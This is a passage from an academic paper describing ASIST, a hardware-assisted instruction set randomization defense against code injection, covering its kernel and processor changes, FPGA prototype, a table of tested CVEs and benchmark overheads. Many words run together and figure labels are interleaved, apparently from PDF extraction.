with executable code for each process, as they have different keys.
This may result in a small memory overhead, but it is necessary in
ordertouseadifferentkeyperprocessandachievebetterisolation.
Inpractice,thememoryallocatedforcodeaccountsonlyforasmall
fraction of the total memory. Note that we can still benefit from
buffer cache, as we copy thecached page.
Wealsomodifiedthe fork() systemcalltorandomlygenerate
anewkeyforthechildprocess. Whenthemodified fork() copies
theparentprocess’spagetable,itomitscopyingitslastlayersothat
the child’s code pages will not be mapped with pages encrypted
withtheparent’skey. Tooperatecorrectly,thedynamicencryption
approachrequiresaseparationofcodeanddatapereachpage. For
this, we modify the linker to align the ELF headers, data, and code
sections toanew page, byadding the proper padding.
3.1.3 SharedLibraries
Ourdynamiccodeencryptiontechniquesupportstheuseofshared
libraries without extra effort. The code of a shared library is en-
crypted with each process’s key on the respective page fault when
loading a page to process’s address space, as we explained above.
In this way we have a separate copy of each shared library’s page
for each process. This is necessary in order to use a different key
per process,which offersbetter protectionand isolation.3.1.4 Self-Modifying Code
Thedesignwepresenteddoesnotsupportrandomizedprograms
withself-modifyingcodeorruntimecodegeneration,i.e.,programs
that modify their code or generate and execute new code. To sup-
port such programs, we added a new system call in Linux ker-
nel:asist_encrypt(char *buf, int size) . This sys-
temcallencryptsthecodethatexistsinthememoryregionstarting
frombufwithsizebytes length, using the current process’s key
that is stored in process table. However, the bufbuffer may be
vulnerable to a code injection attack, e.g., due to a buffer overflow
vulnerability in the program that may lead to the injection of mali-
ciouscodeinto buf. Then,thiscodewillbecorrectlyencryptedus-
ingasist_encrypt() and will be successfully executed. Like
previousworksupportingISRwithself-modifyingcode[ 9],webe-
lievethatprogramsshouldcarefullyusethe asist_encrypt()
systemcall toavoid malicious code injection in buf.
3.1.5 EncryptionAlgorithms andKey Size
Thesimplest,andprobablythefastest,encryptionalgorithmisto
XOR each bit of the code with the respective bit of the key. Since
codeismuchlargerthanatypicalkey,thebitsofthekeyarereused.
To accelerate encryption we XOR code and key as words, instead
of bits. However, XOR was found to be susceptible to key guess-
ing and key extraction attacks [ 48,53]. In our prototype we imple-
mented XOR encryption with key size that can range from 32-bit
to 128-bit, to reduce the probability of a successful guess. The key
size should be a multiple of 32-bit to support XOR between 32-bit
words. Wealsoimplemented transposition ,whichisastrongeren-
cryption algorithm than XOR. In transposition we shuffle the bits
ofa32-bitwordusingan160-bitkey. Foreachbitoftheencrypted
wordwechooseoneofthe32bitsoftheoriginalwordbasedonthe
respective bits of the key. We use the asist_mode flag to define
the encryption algorithm,key size,and encryption method.
3.1.6 Toleranceto Key GuessingAttacks
ToevadeISRprotection,anattackercantrytoguesstheencryp-
tionkeyandinjectcodeencryptedwiththiskey. Theprobabilityof
asuccessfulguesswithXORencryptionis 1/2key size,e.g.,1/232
for 32-bit key and 1/2128for 128-bit key. In case of transposition,
theprobabilityofasuccessfulguessis 1/32!,whichismuchlower
thantherespectiveprobabilitywithXOR.Incaseofasingleguess,
all the above probabilities seem good enough to protect a system.
However,ifthesamekeyisusedconsistently,e.g.,incaseofstatic
encryption,abruteforceattackcanbeusedtoeventuallyguessthe
correct key. Sovarel et al. [ 48] present an incremental attack that
reduces the number of tries needed to find the encryption key by
observingsystem’sbehavior. ASISTcanaddresssuchattackswith
dynamic encryption, as a new key is generated before each execu-
tion. Barrantes et al. [ 9] show that code injections in systems pro-
tected with ISR result in the execution of at most five instructions
before causing an exception. Therefore, with dynamic encryption,
the probability of success of a brute force or incremental attack re-
mains1/2key sizewith XOR or 1/32!withtransposition.
3.2 Hardware Support
Figure3outlinesASIST’shardwarearchitectureforISRsupport
when using XOR with a 32-bit key. We added two new registers
to store the encryption keys: usrkeyandoskey. These registers are
memory mapped using a new Address Space Identifier (ASI), and
areaccessibleonlybytheoperatingsystemthroughtwoprivileged
SPARC instructions: sta(store word to alternate space) and lda
(load word from alternate space). The operating system sets the
usrkeyregister using stawith the key of the user-level process that
2-to-4 
decoderInstruction cach e
Encrypted 
instruction
MMUSupervisor
Unencrypted 
instruction keyusrkey 
regis terQ D
EN
oskey 
regis terQ D
EN32
3232
3232
Main 
Memory3232
32sta [%key] %asi, %addr
key
keyASI
ASIOffset
2
32Address32
32
32
32Instruction 
FetchOffset2Address32
cacheline
Unencrypted instructions32
EN EN EN EN
Figure 3: ASIST hardware support for runtime instruction decryption. We see the modified ASIST processor that decrypts every
instruction with XOR and 32-bit key before the instruction cache. T he key of the user-level running process is stored in usrkey
register, and operating system’skey isstored in oskeyregister. Thesupervisorbit defines which of thesetwokeys will beu sed.
is scheduled for execution before each context switch. In case of
a 32-bit key, a single stainstruction can store the entire key. For
larger keys,more thanone stainstructionsmay beneeded.
The ASIST processor chooses between usrkeyandoskeyfor de-
crypting instructions based on the value of the Supervisor bit. The
Supervisor bit is 0 when the processor executes user-level code, so
theusrkeyis used for decryption, and it is 1 when the processor
executes kernel’s code (supervisor mode), so the oskeyis selected.
Whenatrapinstructionisexecuted( tainstructioninSPARC),con-
trolistransferredfromusertokernelandtheSupervisorbitchange s
from 0 to 1; interrupts are treated similarly. Thus, the next in-
structionswillbedecryptedwith oskey. Controlistransferredback
to user from kernel with the return from trap instruction ( rettin
SPARC).ThentheSupervisorbitbecomes0andthe usrkeyisused.
The context switch is performed when the operating system runs,
andoskeyisusedfordecryption. Thentheproperkeyoftheprocess
thatwillrunimmediately after rettisstoredat usrkey.
The decryption unit is placed before the instruction fetch cycle,
wheninstructionsaremovedfrommemorytotheinstructioncache.
We should note that decryption fits in the processor’s pipeline and
noextracycleisspentonit. Therefore,weexpectnoruntimeover-
head from the hardware decryption part. We expect a slight in-
crease on the cost and on the power consumption due to the extra
hardware we used. Also, ASIST’s hardware architecture is back-
wardscompatiblewithprogramsandoperatingsystemkernelsthat
are not encrypted. We set the default value of the key registers to
zero,which has no effecton thedecryption.
3.2.1 Placementof theDecryptionUnit
Wedecidedtoplacethedecryptionunitasearlyaspossibleinthe
modified processor to avoid adding any performance overhead or
spend an extra cycle, and to avoid breaking any runtime optimiza-
tions made by the processor. There are two possible choices for
placing the decryption unit: before and after the instruction cache.
Figure4presentsthetwooptions. Whenthedecryptionunitisafter
the instruction cache, the instructions are stored encrypted and the
decryption takes place at each fetch cycle. Therefore, it is on the
criticalpathoftheprocessorandmayaddadelayformorecomplex
decryption algorithms. Also, as the decryption circuit is utilized at
each fetch cycle, it may result in increased power consumption.
However, this approach protects the system from a possible code
injection intheinstructioncache.
Ontheotherhand,whenthedecryptionunitislocatedbeforethe
instruction cache, it is accessed only on instruction cache misses.
Thisleadstoreducedpowerconsumptionfordecryption,asthein-
structionsthatareexecutedmanytimes,e.g.,inloops,arefoundde-crypted in the instruction cache. Also, an increased delay for more
complexencryptionatthispointwillnothavesignificantimpactto
the overall performance of the processor. In this case, instructions
are stored unencrypted into the instruction cache, which could be
vulnerable to code injections in the instruction cache. However, to
the best of our knowledge, it is not possible to inject code in the
instruction cache without passing from the path we have modified
to decrypt each instruction. For this reason, we selected to place
the decryption unitbefore theinstructioncache.
3.2.2 DecryptionAlgorithms andKey Size
Figure5showstheimplementationofXORdecryptionwith128-
bitkey. Sinceeachencryptedinstructioninourarchitectureisa32-
bitword,weneedtoselecttheproper32-bitpartofthe128-bitkey,
the same part that was used in the encryption of this instruction.
Thus, we use the two last bits of the instruction’s address to select
the correct 32-bit part of the 128-bit key using a multiplexer, and
finallydecrypttheinstruction. ThesameapproachisusedforXOR
decryption with other key sizes,multipleof 32 bits.
The implementation of decryption with transposition, as shown
in Figure 6, requires significantly more hardware. This is because
it needs 32 multiplexers, one per bit of the decrypted instruction.
Each multiplexer has 32 input lines with all the 32 bits of the en-
crypted instruction, to choose the proper bit. It also has 5 select
lines that define the selection of the input bit at each position. The
select lines of each multiplexer are part of the 160-bit key. Besides
the additional hardware, the runtime operation of transposition is
equallyfastwithXOR,asitdoesnotspendanextracycleanddoes
not impose any delay to the processor. To dynamically select the
decryptionalgorithmandkeysize,wehaveaddedanothermemory
mapped register: asist_mode .
3.2.3 ReturnAddressEncryption
Totransparentlyprotectasystemagainstreturn-to-libcandROP
attacks [14,45], we extended our hardware design to provide pro-
tection of the return address integrity without any runtime over-
head. To this end, we slightly modified the ASIST processor to
encrypt the return address in each function call using the process’s
key,anddecryptitjustbeforereturningtothecaller. Thisissimilar
totheXORrandomcanarydefense[ 21],whichuses mprotect()
to hide the canary table from attackers. On the other hand, we take
advantage of the two hardware key registers, which are not acces-
siblebyanattacker,tohidetheencryptionkey. Also,ourhardware
implementation does notimpose anyperformance overhead.
IntheSPARCV8architecture,functioncallsareperformedwith
thecallsyntheticinstruction,whichisequalto jmplfunc_addr,%o7 .
Instruction cache
Decryption 
unitUnencrypted 
instruction32 32 Instruction 
Fetch
Unencrypted instructionskey
32
Encrypted 
instruction32
Unencrypted 
instructionAddress32
(a) Decryption before theinstructioncacheInstruction cache
Decryption 
unit
Encrypted 
instruction32Instru ction 
Fetch
Encrypted instructions32
Encrypted 
instruction32key
32
Unencrypted 
instructionAddress32
(b) Decryption after theinstructioncache
Figure4: Alternativechoices forthe placement of thedecryption unitin theASIST-e nabledprocessor.
Hence,callwrites the contents of the program counter (PC), i.e.,
thereturnaddress,intothe o7register,andthentransfersthecontrol
to the function’s address func_addr . To return from a function, the
retsyntheticinstructionisused,whichisequalto jmpl%i7+8,%g0
whenreturningfromanormalsubroutine( i7registerinthecalleeis
thesamewith o7registerinthecaller)and jmpl%o7+8,%g0 when
returningfromaleaf subroutine.
Toencryptthereturnaddressoneachfunctioncall,wejustXOR
the value of the PC with the usrkeyregister when a callorjmpl
instruction is executed and the value of the PC is stored into the
o7register. The return address, i.e., the i7register in the callee, is
decrypted with usrkeywhen ajmplinstruction uses the i7register
(oro7in case of leaf subroutine) to change the control flow ( ret
instrunction). Thus, the modified processor will return to the (%i7
XORusrkey)+8 address.
Thisway,thereturnaddressremainsalwaysencrypted,e.g.,when
it is pushed onto the stack (window overflow), and it is always de-
cryptedbythe jmplinstructionwhenreturning. Hence,anymodifi-
cationofthereturnaddress,e.g.,thoughastack-basedbufferove r-
flow or fake stack by changing the stack base pointer, or any ret
instructionsexecutedbyaROPexploitwithouttheproper call,will
lead to an unpredictable return address upon decryption, as the us-
rkeyis unknown tothe attacker.
Note that jmplis also used for indirect jumps, not only for func-
tion calls and return, so our modified jmpldecrypts the given ad-
dress only when the i7(oro7) register is used. This is a usual con-
vention for function calls in SPARC and it should be obeyed, i.e.,
thei7ando7registers should not be used for any indirect jumps
besides returning from function calls. Also, the calling conven-
tions should be strictly obeyed: return address cannot be changed
in any legal way before returning, and retinstructions without a
preceding callinstruction cannot be called without a system crash.
Asthecallingconventionsarenotalwaysstrictlyobeyedinseveral
legacy applications and libraries, the use of return address encryp-
tionmaynotbealwayspossible. Therefore,althoughASISToffers
this hardware feature, it may or may not be enabled by the soft-
ware. We use one bit of the asist_mode register to define whether
thereturnaddress encryption willbe enabled or not.
3.3 Operating SystemSupport
Wenowdescribethenewfunctionalityweaddedintheoperating
system to support the ASIST hardware features for ISR in order to
protect the system from attacks against possibly vulnerable user-
level processesand kernel’s vulnerabilities.
3.3.1 KernelModifications
In our prototype we modified the Linux kernel, and we ported
our changes to 2.6.21 and 3.8 kernel versions. First, we added two
new fields in the process table records ( task_struct in Linux
kernel): theprocess’s keyandtheasist_mode . Weinitializethepro-
cess’skeytozeroandasist_modetodynamic,soeachunencrypted
programwillbe dynamically encrypted.Unencrypted 
instruction32key
32
Encrypted 
instruction128
32 bit32 bit32 bit 3232 bit32
32
32
32Offset
2
Figure 5: Decryption using XOR with 128-bit key. Based on the
last two bits of the instruction’s address (offset) we select the
respective 32-bitpart of the128-bit key fordecryption.
Unencrypted 
instruction32key
32
Encrypted 
instruction32...3216032...32
32...3255
5Bit 0
Bit 1
Bit 315 bit 5 bit ... 5 bit
160 bit5 5 5
...
Figure 6: Decryption using transposition with 160-bit key. The
implementation of transposition requires significantly more
hardware, because it needs 32 multiplexers with all the 32 bits
of theencrypted instruction as inputlines in each one.
We changed the binary ELF loader to read the key of the ex-
ecutable ELF file, in case it is statically encrypted, or generate
a random key, in case of dynamic encryption, after calling the
execve() system call. Then, the loader stores the process’s key
to the respective process table record. We also changed the sched-
uler to store the key of the next process that is scheduled to run in
theusrkeyregister before eachcontext switch. For this, we added
anstainstruction before the context switch to store a 32-bit key.
Forlargerkeys,thenumberof stainstructionsdependsonkeysize.
Toimplementdynamicencryptionandsharedlibrarysupportwe
modifiedthepagefaulthandler. Foreachpagefault,wefirstcheck
whether it is related to code (text page fault) and whether the pro-
cess that caused the page fault uses dynamic code encryption. If
so, we allocate a new anonymous page that is not backed by any
file. Upon the reception of the requested page from disk (or buffer
cache), we encrypt its data with process’s key and copy it at the
same step into the newly allocated page. Then, the new page is
mappedintotheprocess’saddressspace. Eventually,thispagewill
contain the code thatwill beaccessed bythe process.
3.3.2 KernelEncryption
To encrypt kernel’s code we used the same approach with static
binary encryption. We modified an uncompressed kernel image by
(i)adding a new note section that contains the kernel’s encryption
key, and(ii)identifying and encrypting all code sections. We had
to carefully separate code from data into different sections while
building the kernel image. The oskeyregister saves the key of ker-
nel’s encrypted code. We modified the bootloader to read and then
store the kernel’s key into the oskeyregister with an stainstruc-
tion,justbeforethecontrolistransferedfrombootloadertokernel.
Sinceoskeyisinitializedwithzero,whichhasnoeffectinXORde-
cryptionthatisalsodefault,theunencryptedcodeofthebootloader
canbe successfullyexecuted intherandomized processor.
Wedecidedtostaticallyencryptthekernel’scodesoastonotadd
any delay to the boot process. Due to this, the key is decided once
whenthekernelimageisbuiltandencrypted,anditcannotchange
withoutre-encryption. Anotheroptionwouldbetoencrypttheker-
nel’s code while booting, using a new key that is randomly gener-
ated at this point. This option could add a further delay to the boot
process. However,mostsystemstypicallyuseacompressedkernel
image that is decompressed while booting. Thus, we can encrypt
the kernel’s code during the kernel loading stage when the image
is decompressed into memory. The routine that decompresses and
loads the kernel to memory must first generate a random key and
thenencrypt the kernel’s code along withdecompression.
4. ASISTPROTOTYPEIMPLEMENTATION
InthissectionwedescribetheASISTprototypeimplementation,
we present the results of the hardware synthesis using an FPGA
board,intermsofadditionalhardwareneededcomparedtotheun-
modified processor, and finally we discuss how the proposed sys-
temcan beeasily portedtoother architectures andsystems.
4.1 Hardware Implementation
We modified Leon3 SPARC V8 processor [ 1], a 32-bit open-
sourcesynthesizableprocessor[ 26],toimplementthesecurityfea-
tures of ASIST for hardware-based ISR support, as we described
inSection 3.2. Allhardwaremodificationsrequiredfewerthan100
lines of VHDL code. Leon3 uses a single-issue, 7-stage pipeline.
Our implementation has 8 register windows, an 16 KB 2-way set
associative instruction cache, and a 16 KB 4-way set associative
data cache. We synthesized and mapped the modified ASIST pro-
cessors on a Xilinx XUPV5 ML509 FPGA board [ 54]. The FPGA
has 256 MB DDR2 SDRAM memory and the design operates at
80 MHz clock frequency. It also has several peripherals including
an100MbEthernet interface.
4.2 Additional Hardware
Table2shows the results of the synthesis for three different
hardware implementations of ASIST, using XOR decryption with
32-bit and 128-bit keys, and decryption with transposition using
160-bit key. We compare them with the unmodified Leon3 pro-
cessor as a baseline to measure the additional hardware used by
ASIST to implement ISR functionality in each case. We see that
ASIST with XOR encryption and 32-bit key adds less than 1% of
additional hardware, both in terms of additional flip flops (0.73%)
and lookup tables (0.61%). When a larger key of 128 bits is used
for encryption, we observe a slight increase in the number of flip
flops (2.81%) due to the larger registers needed to store the two
128-bit keys. The implementation of transposition results in sig-
nificantly more hardware used, both for flip flops (6.62% increase)
andlookuptables(6.87%increase). ThisisduetothelargercircuitSynthesized Processor Flip Flops LUTs
Vanilla Leon3 9,227 16,986
XOR with 32-bit key 9,294 (0.73% increase) 17,090 (0.61% increase)
XOR with 128-bit key 9,486 (2.81% increase) 17,116 (0.77% increase)
Transposition with 160-bit key 9,838 (6.62% increase) 18,153 (6.87% increase)
Table 2: Additional hardware used by ASIST. We see that
ASIST adds just 0.6%–0.7% more hardware with XOR de-
cryption using a 32-bit key, while it adds significantly more
hardware (6.6%–6.9%) when usingtransposition.
usedforthehardwareimplementationoftransposition,whichcon-
sists of 32 multiplexers with 32 input lines each, as we showed in
Section3.2.2.
4.3 KernelandSoftware Modifications
Theresultingsystemisafull-featuredSPARCworkstationusing
aLinuxoperatingsystem. WemodifiedtheLinuxkernelaswede-
scribed in Section 3.3. We ported our Linux kernel modifications
in 2.6.21 and 3.8.0 kernel versions. We built a cross compilation
tool chain with gccversion 4.7.2 and uClibc version 0.9.33.2
to cross compile the Linux kernel, libraries, and user-level appli-
cations. Thus, all programs running in our system (both vanilla
andASIST),includingvulnerableprogramsandbenchmarks,were
cross compiled with this tool chain on another PC. We slightly
modifiedlinkerscriptstoseparatecodeanddataforbothstaticand
dynamic code encryption, and align headers, code, and data into
separate pages in case of dynamic encryption. To implement static
encryption, we extended objcopy with the--encrypt-code
flag. Thekey can beprovided bythe useror randomly chosen.
4.4 Portability toOther Systems
Our approach is easily portable to other architectures and op-
erating systems. Regarding ASIST’s hardware extensions, imple-
menting new registers that are accessible by the operating system
is quite easy in most architectures, including x86. Encrypting the
returnaddressateachfunctioncallanddecryptingitbeforereturn-
ing depends on the calling convention at each architecture. For
instance, in x86 it can be implemented by slightly modifying call
andretinstructions. In our current design, we have implemented
the runtime instruction decryption for RISC architectures that use
fixed-length instructions. Thus, porting the decryption functional-
ity in other RISC systems will be straight-forward. On the other
hand, CISC architectures such as x86 support variable-length in-
structions. However,ourapproachcanalsobeimplementedinsuch
architectures with minor modifications. Since instructions reside
in memory before they are executed, we can simply encrypt them
without the need of precise disassembly, e.g., in blocks of 32-bits,
dependingonthekeysize. Inarchitectureswithvariable-lengthin-
structionsthisencryptionwillnotbealignedateachinstruction,but
this is not an issue. The memory blocks will be decrypted accord-
ingly by the modified processor before execution. For instance,
a memory block can be decrypted based on the byte offset of its
respective memory address. Also, since we have placed the de-
cryption unit before the instruction cache, decryption is performed
at eachwordthat isstoredincache, rather than ateach instruction.
WehaveimplementedourprototypebymodifyingtheLinuxker-
nel. However, the same modifications can be made in other oper-
ating systems as well, as we change generic kernel modules such
as the binary loader, the process scheduler and context switch, and
the page fault handler. These modules exist in all modern operat-
ing systems and they can be changed respectively to support the
hardware features offeredbya randomized processor.
CVE Reference Vulnerability Description Access Vector Location Vulnerable Program
CVE-2010-1451Linux kernel before 2.6.33 does not properly implement a non-executable stack on SPARC
platformLocal Stack Custom
CVE-2013-0722 Buffer overflow due to incorrect user-supplied input validation Remote Stack Ettercap 0.7.5.1and earlier
CVE-2012-5611Buffer overflow that allows remote authenticated users to execute arbitrary code via a l ong
argument to the GRANT FILEcommandRemote StackOracle MySQL 5.1.65 and
MariaDB 5.3.10
CVE-2002-1549 Buffer overflow that allows toexecute arbitrary code via a long HTTP GET request Remote Stack Light HTTPd (lhttpd) 0.1
CVE-2002-1337 Buffer overflow that allows toexecute arbitrary code via certain formatted address fields Remote BSS Sendmail 5.79 to 8.12.7
CVE-2002-1496Buffer overflow that allows to execute arbitrary code via a negative value in the Content-
Length HTTP headerRemote HeapNull HTTPd Server 0.5.0 and
earlier
CVE-2010-4258Linux kernel allows to bypass access_ok() and overwrite arbitrary kernel memory location s
byNULL pointer dereference togain privilegesLocal Kernel Linux kernel before 2.6.36.2
CVE-2009-3234Buffer overflow that allows to execute arbitrary user-level code via a ”big size data“ to the
perf_counter_open() system callLocalKernel
stackLinux kernel 2.6.31-rc1
CVE-2005-2490Buffer overflow that allows to execute arbitrary code by calling sendmsg() and modi fying
the message contents inanother threadLocal Stack Linux kernel before 2.6.13.1
Table 3: Representative subset of code injection attacks tested with ASIST. We see that ASIST is able to successfully prevent code
injection attackstargeting vulnerable user-level programs as we ll askernel vulnerabilities.
5. EXPERIMENTALEVALUATION
We mapped our prototype onto an FPGA running two versions
of the Linux kernel, 2.6.21 and 3.8, as described in Section 4. We
used the Ethernet adapter of the FPGA and configured the system
with networking and a static IP address. This allows for remote
exploitationattemptsforoursecurityevaluation,andforevaluating
the performance of a Web server. As the available memory on the
FPGA is only 256 MB, and there is no local disk in the system,
we used NFS to mount a partition of a local PC that contains all
the cross compiled programs needed for the evaluation. To avoid
measuringNFSdelaysinourevaluation,wecopiedeachexecutable
programinthe localRAM filesystembeforeits execution.
We evaluated the ASIST prototype that uses XOR encryption
with a 32-bit key, comparing static and dynamic encryption im-
plementations with an unmodified system (vanilla processor and
unmodified operating system). We observed that using a larger
keyortranspositioninsteadofXORforencryptinginstructionshas
thesameeffectivenessonpreventingcodeinjectionattacksandthe
sameefficiencyintermsofperformance. Wedidnotusethereturn
addressencryption in our securityand performance evaluation.
5.1 SecurityEvaluation
To demonstrate the effectiveness of ASIST at preventing code
injectionattacksexploitinguser-orkernel-levelvulnerabilities,we
tested a representative sample of attacks shown in Table 3. The
first six attacks target buffer overflow vulnerabilities on user-level
programs,whilethelastthreeattackstargetaNULLpointerderef-
erence and twobuffer overflow vulnerabilities of theLinuxkernel.
First, we ran a vanilla 2.6.21 kernel, which does not properly
implement a non-executable stack on SPARC. We built a custom
program with a typical stack-based buffer overflow vulnerability,
andweusedalargecommand-line argument toinject SPARCexe-
cutable code into the program’s stack, which was successfully ex-
ecuted by overwriting the return address. We then used an ASIST
modifiedkernelwithoutenablingthereturnaddressencryption,and
we ran a statically encrypted version of the vulnerable program
with the same argument. In this case, the program was terminated
with an illegal instruction exception, as the unencrypted injected
code could not be executed. Similarly, we ran an unencrypted ver-
sionofthevulnerableprogramandreliedonthepagefaulthandler
for dynamic code encryption. Again, the injected code caused an
illegalinstructionexception due totheISR.
We performed similar tests with all the other vulnerable pro-
grams: Ettercap,whichisapacketcapturetool,MariaDBdatabase,
Light HTTPd and Null HTTPd webservers, and sendmail. Theseprograms were cross compiled with our toolchain and encrypted
with our extended objcopy tool. In all cases our remotely in-
jectedshellcodewasexecuted successfullyonlyonthevanillasys-
tem, while ASIST always prevented the execution of the injected
code and resultedinillegal instructionexception.
Wealsotestedattacksexploitingthreekernelvulnerabilitieswith
and without ASIST. We cross compiled, modified and encrypted
three different kernel versions for each one: 2.6.21, 2.6.31-r c1 and
2.6.11. Whenrunningthevanillakernelontheunmodifiedproces-
sor, the kernel exploits resulted in the successful execution of the
provideduser-levelcodewithkernelprivileges. Ontheotherhand,
the encrypted kernels with ASIST resulted in kernel panic for all
theexploits,avoiding asystemcompromisewithkernelprivileges.
5.2 PerformanceEvaluation
ToevaluateASIST’sperformancewecompare (i)vanillaLeon3
with unmodified Linux kernel (Vanilla), (ii)ASIST with static
encryption (ASIST-Static), and (iii)ASIST with dynamic code
encryption (ASIST-Dynamic), when running the SPEC CPU2006
benchmark suiteandtwo realworld applications.
5.2.1 Benchmarks
We ran all the integer benchmarks from the SPEC CPU2006
suite (CINT2006) [ 49], which includes several CPU-intensive ap-
plications. Figure 7shows the slowdown of each benchmark when
using ASIST with static and dynamic encryption, compared to the
vanilla system. We see that both ASIST implementations impose
lessthan1.5%slowdowninallbenchmarks. Formostbenchmarks,
ASIST exhibits almost the same execution times as with the un-
modified system. This is due to the hardware-based instruction de-
cryption, which does not add any observable delay. Moreover, the
modified kernel performs minor extra tasks: it reads the key from
the executable file (for static encryption) or it randomly generates
a new key (for dynamic encryption) only once per each execution,
while it adds just one extra instruction before each context switch.
Wenoticeaslightdeviationfromthevanillaexecutiontimeonlyfor
three of the benchmarks: gcc,sjeng, andh264ref . For these
benchmarks, we observe a slight slowdown of 1%–1.2% in static
and 1%–1.5% in dynamic encryption. This deviation is probably
due to the different linking configurations (statically linked versus
dynamically linked sharedlibraries).
One might expect that the dynamic encryption approach would
experience a considerable performance overhead due to the ex-
tra memory copy and extra work needed to encrypt code pages at
each text page fault. However, our results in Figure 7indicate that
0.900.951.001.051.101.151.20
400.perlbench 401.bzip2 403.gcc 429.mcf 445.gobmk 456.hmmer 458.sjeng 462.libquantum 464.h264refSlowdownVanilla
ASIST-Static
ASIST-Dynamic
Figure 7: Runtime overhead using the SPEC CPU2006 bench-
marksuite. WeseethatbothASISTimplementationshaveneg-
ligibleruntimeoverhead compared tothe vanillasystem.
Benchmark Data page faults per second Text page faultsper second
400.perlbench 38.4964 1.97215
401.bzip2 44.3605 0.193831
403.gcc 60.3235 3.93358
429.mcf 51.7769 0.0497679
445.gobmk 25.4735 0.905984
456.hmmer 0.0546246 0.0223249
458.sjeng 71.9751 0.0676988
462.libquantum 5.18675 0.0486765
464.h264ref 3.19614 0.0333707
Table 4: Data and text page faults per second when running the
SPEC CPU2006 benchmark suite. All benchmarks have very
few text page faults per second, which explains the negligible
overhead of thedynamicencryption approach.
dynamic encryption performs equally well with static encryption.
Thus,ourproposedapproachtodynamicallyencryptprogramcode
at the page fault handler, instead of statically encrypt the code be-
foreprogram’sexecution,doesnotseemtoaddanyextraoverhead .
Tobetterunderstandtheperformanceofthisapproach,weinstru-
mentedtheLinuxkerneltomeasurethedataandtextpagefaultsof
eachprocessthatusesthedynamicencryptionmode. Table 4shows
the data and text page faults per second for each benchmark. We
seethatallbenchmarkshaveaverylowrateoftextpagefaults,and
most of them experience significantly less than one text page fault
per second. Moreover, we observe that the vast majority of page
faults are for data pages, while only a small percentage of the total
page faults are related to code. Therefore, we notice a negligible
overhead with dynamic code encryption at the page fault handler
for two main reasons: (i)as we see in Table 4, text page faults
are very rare, and (ii)the overhead of the extra memory copy and
page encryption is significantly less that the page fault’s overhead
for fetching the requested page from disk. Note that in our setup
weuseaRAMfilesysteminsteadofanactualdisk,soaproduction
systemmay experience aneven lower overhead.
The very low page fault rate for pages that contain executable
code makes the dynamic encryption a very appealing approach, as
it imposes practically zero runtime overhead, and at the same time
it supports shared libraries and transparently generates a new key
ateach program execution.5.2.2 Real-world Applications
WeevaluatedASISTwithtworeal-worldapplications. First,we
ran thelighttpd Web server in a vanilla system and in the two
versions of ASIST. We used another machine located in the local
network to repeatedly download 14 files of different sizes, ranging
from 1 KB to 8 MB, and we measured the average download time
for each file. Figure 8shows the slowdown of the download time
as a function of the file size for each system. We see that ASIST
does not impose any considerable delay, as the download time re-
mains within 1% of the vanilla system for all files. We also no-
tice that both static and dynamic encryption implementations per-
form almost equally good. We measured the page faults caused by
lighttpd :261data page faults per second, and just 0.013text
page fault per second. Thus, the dynamic encryption did not add
any runtime overhead to the server. Moreover, we observed that
most of the text page faults occur during the first few milliseconds
ofthelighttpd execution,whenthecodeisloadedintomemory,
and then practically notext page faultoccurs.
Inourlastbenchmarkweranan sqlite3 databaseinthevanilla
and in the two ASIST setups. To evaluate the performance of
sqlite3 we used the C/C++ SQLite interface to implement a
simple benchmark that reads a large tab-separated file and updates
a table’s entries with the respective values. Figure 9shows the
slowdown when inserting data into the database using this bench-
mark as a function of the number of insertions. ASIST imposes
less than 1% slowdown on the database’s operation for both static
anddynamicapproaches,evenonsmalldatasetsthatdonotprovide
ASIST withenough time toamortize theencryption overhead.
6. RELATEDWORK
Instruction Set Randomization. ISR was initially introduced
as a generic defense against code injections by Kc et al. [ 31] and
Barrantes et al. [ 9,10]. To demonstrate the feasibility of ISR, they
proposed implementations with bochs[33] andValgrind [36]
respectively. Hu et al. [ 29] implemented ISR with Strata SDT
tool [42] using AES as a stronger encryption for instruction ran-
domization. Boyd et al. [ 13] propose a selective ISR to reduce the
runtime overhead. Portokalidis and Keromytis [ 41] implemented
ISR using Pin [ 34] with moderate overhead and shared libraries
support. In Section 2.3we described in more detail all the existing
software-based ISR implementations and we compared them with
ASIST.ASISTaddressesmostofthelimitationsoftheexistingISR
approaches owingto itssimpleand efficient hardware support.
Defenses against code injection attacks. Modern hardware
platforms support non-executable data protection, such as the No
eXecute (NX) bit [ 38]. NX bit prevents stack or heap data from
being executed, so it is capable to protect against code inject at-
tacks without performance degradation. However, its effectiveness
dependsonitsproperusebysoftware. Forinstance,anapplication
maynotsettheNXbitonalldatasegmentsduetobackwardscom-
patibility constraints, self-modifying code, or bad programming
practices. We believe that ASIST can be used complementary to
NX bit to serve as an additional layer of security, e.g., in case that
NX bit may not be applicable or can be bypassed. For instance,
many ROP exploits use the code of mprotect() to make exe-
cutable pages with injected code, bypassing the NX bit protection.
This way, they can execute arbitrary code to implement the attack
without the need of more specific gadgets, which may not be easy
to find, e.g., due to the use of Address Space Layout Randomiza-
tion(ASLR).Incontrast,theseexploitscannotexecuteanyinjected
codeinasystemusingASIST,asthiscodewillnotbecorrectlyen-
crypted. Thus,ASISTwith ASLRprovides a stronger defense.
0.900.951.001.051.101.151.20
12481632641282565121024204840968192Slowdown
File size (KB)Vanilla
ASIST-Static
ASIST-Dynamic
Figure 8: Slowdown when downloading different files from a
lighttpd Web server as a function of the file size. We see that
ASISTaddsless than1%delay forallfilesizes.0.900.951.001.051.101.151.20
128 256 512 1024 2048 4096 8192Slowdown
Table InsertionsVanilla
ASIST-Static
ASIST-Dynamic
Figure 9: Slowdown when inserting data into sqlite3 as a func-
tionofthenumberofinsertions. WeseethatASISTexperiences
lessthan1%slowdown even forvery smalldatasets.
A recent attack demonstrated by Snow et al. [ 47] is also able to
bypass NX bit and ASLR protection using ROP. First, it exploits
a memory disclosure to map process’s memory layout, and then it
uses a disassembler to dynamically discover gadgets that can be
used for the ROP attack. ASIST with ASLR, however, is able to
prevent this attack: even if memory with executable code leaks to
the attacker, the instructions will be encrypted with a randomly-
generated key. This way, attacker will not be able to disassemble
the code and find useful gadgets. ASIST ensures that key does not
reside in process’s memory, while stronger encryption algorithms
(likeAES) canalsofitin our designtoavoid inferringthekey.
SecVisor[ 43]protectsthekernelfromcodeinjectionattacksus-
ing a hypervisor to prevent unauthorized code execution. While
SecVisor focuses on kernel’s code integrity, ASIST prevents the
execution of unauthorized code inbothuser- and kernel-level.
Defenses against buffer overflow attacks. StackGuard [ 21]
uses canaries to protect the stack, while PointGuard [ 20] encrypts
all pointers while they reside in memory and decrypts them before
